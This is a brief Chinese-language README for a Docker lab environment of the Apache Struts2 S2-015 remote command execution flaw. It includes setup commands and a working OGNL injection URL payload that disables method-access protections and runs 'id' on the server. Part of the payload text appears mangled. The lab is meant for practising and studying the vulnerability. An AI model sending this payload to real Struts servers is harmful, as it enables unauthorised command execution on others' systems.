Struts2 S2-015 漏洞环境

漏洞信息

参考 http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html

获取环境:

  1. 拉取镜像到本地

    $ docker pull medicean/vulapps:s_struts2_s2-015
  2. 启动环境

    $ docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-015

    -p 80:8080 前面的 80 代表物理机的端口,可随意指定。

使用与利用

访问 http://你的 IP 地址:端口号/

Exp

命令执行

/${%23context['xwork.MethodAccessor.denyMethodExecution']=false,%23f=%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),%23f.setAccessible(true),%23f.set(%23_memberAccess,true),@[email protected](@[email protected]().exec('id').getInputStream())}.action

Copied From: Medicean/VulApps/s/struts2/s2-015